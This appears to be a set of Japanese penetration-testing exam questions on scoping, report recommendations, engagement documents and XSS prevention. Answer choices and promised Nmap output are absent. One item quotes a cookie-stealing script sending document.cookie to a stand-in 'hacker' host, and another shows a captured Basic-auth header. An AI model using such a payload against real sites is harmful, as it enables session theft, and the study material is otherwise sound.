ペネトレーションテスターは、評価の途中で評価チームに加わります。クライアントは、口頭でもスコープ文書でも、運用ネットワークをテストしないようチームに要請しました。ただし、新しいテスターはこのリクエストを認識せず、運用環境でエクスプロイトを実行し続けます。この誤解を最も効果的に防ぐことができたのは次のうちどれですか?

侵入テスターは最近、企業環境内のコア ネットワーク デバイスのセキュリティのレビューを完了しました。主な調査結果は次のとおりです。
* ネットワーク デバイスに送信される次のリクエストが傍受されました:
GET /ログイン HTTP/1.1
ホスト: 10.50.100.16
ユーザーエージェント: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 受け入れ言語: en-US,en;q=0.5 接続: キープアライブ 認証: 基本 WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* ネットワーク管理インターフェイスは実稼働ネットワークで使用できます。
* Nmap スキャンにより次の結果が返されました。

最終報告書の推奨事項セクションに追加するのが最も適切なのは次のうちどれですか? (2つお選びください。)

次のコードがあるとします。
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
この種の攻撃を防ぐ最善の方法は次のうちどれですか? (2つお選びください。)

次の文書のうち、ペネトレーション テスト業務に関連するすべての関係者によって合意され、範囲、連絡先、コスト、期間、成果物が定義されているものはどれですか?

攻撃者が使用する一般的な戦術とテクニックのマトリックスと、推奨される緩和策を提供しているものは次のうちどれですか?